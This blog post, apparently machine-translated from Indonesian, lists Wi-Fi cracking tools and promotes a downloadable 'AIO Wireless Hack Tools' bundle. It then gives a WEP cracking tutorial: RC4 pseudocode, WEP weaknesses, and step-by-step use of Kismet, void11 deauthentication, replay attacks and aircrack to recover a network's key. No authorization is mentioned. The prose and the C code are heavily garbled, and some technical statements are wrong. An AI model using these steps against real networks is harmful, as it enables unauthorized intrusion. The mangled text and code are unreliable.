WIRELESS HACKING TOOL

NetStumbler
Netstumbler known as Network Stumbleris a means of detecting acilitates Wireless Wireless LANs using 802.11b, 802.11a and 802.11g WLAN standard that runs on Microsoft operating systems from Win98 - Win Vista, there is also another version called Mini Stumbler Anothere that uses the operating system Windows CE. For tool "that can be on the handheld. 

You can get it here

AircrackFastest to WEP / WPA cracking toolAircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. This can be done within 40 to 512-bit WEP password is encrypted and only once the package "has been collected. Aircrack can also attack WPA 1 or 2 networks using advanced cryptographic methods rude or pushy. The suite includes airodump (an 802.11 packet maker program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP / WPA for decision-file).You can get here Aircrack
 

AirSnort802.11 WEP Encryption Cracking ToolAirSnort is a wireless LAN (WLAN) tool which is used to recover encryption passwords. It was developed by the shmoo group of passive and operated by monitoring transmissions, computing encrypted passwords will be done if the package has been collected. You may also be interested in this AirSnort.You can get here AirSnort
 

CowpattyCowpatty this is a good tool for cracking WPA-PSK force, which is considered "New WEP" for Wireless Home Security. This program simply tries a bunch of different options from a dictionary file to see and discover what is defined as Pre-Shared Key.You can get here Cowpatty
 

AsleapThis tool is very good when using the network Leap. This tool can be used to gather the authentication data that is being passed in the network, and this can be sniffed, so be on crack. Leap does not protect the authentication like other "real" EAP, which is the main reason why Leap can be easily damaged.You can get here Leap
 

EtherealEthereal is used by the whole world Wind0s by both operating systems and open source, which is used for troubleshooting, analysis, and protocol software development, and education. Has all the standard features that would be expected in protocol analysis, and several features not seen in every product. Open-source license allows the addition of enhancements for those of you "who have expertise
have expertise.
You can download Etherea
l here
Others :

AiO Wireless Hack Tools 2009:

NetStumbler 0.4.0
Kismet 2005 2008 R
Wellenreiter v1.9
WEP Crack 0.1.0
AirSnort 0.2.7e
Wepwedgie 0.1.0 alpha
Hotspotter 0.4

Information Files:

Name: AIO Wireless Hack Tools 2009 Full
Size: 8.1 MB (recovery register 1%)
Language: Bahasa Indonesia
Support Platform: Linux, Windows.
Format: RAR
Download file:


WIRELESS HACKING TUTORIAL
WEP is Wired Equivalent Privacy. This is an encryption standard for wireless until now. Many people do not even use WEP due to weak security, hassle, or WEP is pointless, because it can dicrack, although usually take a while to obtain enough data to get the WEP passwords, especially passwords are very long.
 

WEP consists of secret passwords and encryption. Secret password that is shared between access point and everyone in the wireless network, consisting of 5 or 13 characters. Used by the process of encryption for communications package that is disguised throughout the WLAN, or Wireless Local Area Network. All packages are unique and random, so if someone makes a crack in one package key, they can not see what others have done without cracking on them too.
 

This is all done using the secret password together with the three characters (the Initialization Vector, or IV) who were randomly selected by the wireless device. For example, if you are the password "hello", may make "abchello" to a package, and "xyzhello" for the other.
 

WEP also uses XOR, or Exclusive OR, for encryption. XOR compares two bits, and if theyre different, it will return 1. If not, it will return 0. For example, 1 XOR 1 will be 0, and 1 XOR 0 is 1.
Array is a variable that can hold multiple values. For example, an array of alphabet [26] will continue to value 26, which are labeled 0 through 25.
Example:
 

alphabet [0] = 'A';alphabet [1] = 'B';
void swap (char & first, char & second){char temp = first;first = second;second = temp;}
swap (alphabet [0], alphabet [1]);
If the values ​​array randomely have swapped many times, it can not be sent to the array element that holds the value.
 

The actual algorithm used by WEP to encrypt packets is RC4. RC4 consists of two steps: with a password and Scheduling Algorithm Pseudo Random Generation Algorithm. The first part, the scheduling algorithm is a password, or KSA, like this in C code, assuming k [] is an array of secret passwords:
int n = 256;char s [n];/ / Initializationfor (int i = 0; i <= (n - 1); i + +) s [i] = i; int j = 0; / / scrambling for (int l = 0, l <= (n - 1); l + + ) {j + = s [l] + k [l]; swap (s [l], s [j]);}
Let's examine the code above until we know that:
 

1. Integer 'n' determines how we make kuay encryption. Here using WEP 256.2. Array of characters 'k' is the secret password in combination with three fake character. This does not change at all in this program.3. The '/ / Initialize' only represents the initialization, as much as the characters 0-255.4. Integer 'j' is used to hold value during scrambling. Always initialized to 0, because it must always be in the range 0.5. Furthermore, (where '/ / scrambling') scrambling process begins. Basically, will result in 's' array 'random' than ever before 's' specified array.6. Inside the circle, which merges their first passwords (k) with a random array (s) to create a complete character. Then, the call to swap () puts into an array of characters is completed.
 

Now it's time for the second part of the RC4 algorithm, then the Pseudo Random Generation Algorithm (PRGA). This section of the output stream passwords based on KSA's pseudo-random array. This key stream will be merged with cleartext data to create the encrypted data.
 

int i = 0;int j = 0;int z;while (data_disini){i + +;j + = s [i];swap (s [i], s [j]);z = s [s [i] + s [j]];/ / Z is outputted here/ / And then XOR'd with cleartext}1. Integers 'i' and 'j' is declared and initialized to 0.2. There is a loop that runs until the end of the data packet is reached.3. 'I' is incremented in each iteration of the loop is to keep it running.4. 'A' holds the pseudo-random numbers.5. Another caller to swap () an active character in s [i] and s [j].6. 'Z' is calculated by adding s [i] and s [j] and take values ​​in appropriate elements of their numbers. This reason will be explained later.7. 'Z' is XOR'd with the cleartext to create a new text is encrypted.
 

Cyclic redundancy checksum CRC stands for. When the packets are sent to the entire network, should be no way to know the host receives a packet has not been damaged in any way. It is the purpose of the CRC. Before data is sent, the CRC calculating the value, or checksum, for packages will be shipped with the package. If accepted, the new count of the target host using a CRC checksum. If the CRCs match, the packet of credibility has been confirmed.
 

  In summary. Access Point creates a pseudo-random characters. They are joined by sharing prechosen password to create a secret password. KSA then use this password to create a pseudo-random array, which is used by the PRGA stream to create a key. This password is then XORed with the cleartext to create the encrypted data, and entered into the CRC and make the checksums.
 

Then, for receiving host decrypts. Character is added by the AP to be deleted and merged with the keys to be sent back together with a secret password. Password go through the whole process of RC4, and XOR'd with the encrypted text, and create cleartext checksum. Checksum will be removed and made a then compared to see if the data safe, and whether this was the original user.
Part II: Cracking WEP
Before we get cracking WEP, let us discuss some flaws in the encryption process:


* There is a 5% chance that the value in s [0]-s [3] will not change after three iterations by KSA.* The first value in the encrypted data is SNAP, which 0xAA, or 170 base 10. Sniffing the first of bytes and XOR-ing the encrypted text to 170 will output the first byte of the PRGA.* A particular format of bytes given by the AP will show that he is weak and easy to crack. This format is (B + 3, 255, X), where B is the byte of the password secret. Where X could be worth anything.
 

 We'll talk about the KSA now. Let us define some variables to "test":* Character code taken from the AP is 3255.7. We sniffed it from the air. We will use the test results have shown that the code is very weak.* Shared password is 22222. In practice, you will not know this.* N is 256.* If there is a value above 256, modulo operation will be performed on it. The resulting value that will be used.* Array 's' has been confirmed, with a value of 0-255.
  

Open the program Kismet. Kismet is free wireless scanner for Linux. When you open it, you'll see a list of WLANs within range. Choose one and make a note of the four following details (note that the target obtained from each host computer on the WLAN):
* AP MAC Address* MAC Address of the target computer.* WEP - Key used* Wi-Fi-channel used
  

Open Aircrack and you will start capturing packets. You also will capture the IVs. But it takes a long time. He can even last for several hours or days to capture the number of IVs to crack WEP passwords.Fortunately, we can accelerate it. For example, if a WLAN is very busy, it will be more traffic IVs packets, so the IVs more easily retrieved. If we continue to ping the network, will result in more packets of data.ping-t ip_address-l 50 000  So what to do now? We have less data, but we have to get a WEP password here. There is a time to pass void11. Void11 ​​that in deauthenticate AP to all the hosts who were there. Cutting off is up to all hosts. The first thing to do in this case is automaticall who will try to reconnect the connection to the AP.But there is another technique called a replay attack. It captures a packet from a host on the WLAN, then do spoofs the host and continue to repeat the packet over and over again. Generate traffic data packet is very large. The best of these programs is airreplay. This is for what used void11.  Open airodump. Now, say thank you to Replay Attack. IV run about 200 per second. Wow! You'll probably get all the necessary packets within 10 minutes. All IVs are being written into a file that will be taken. Then open aircrack. Aircrack will read all the IVs are taken from files, and perform statistical analysis on the file. Then, he will try to brute force a file "that exists. After finding the password, the password would be supplied to you.

0 Commen:

Posting Komentar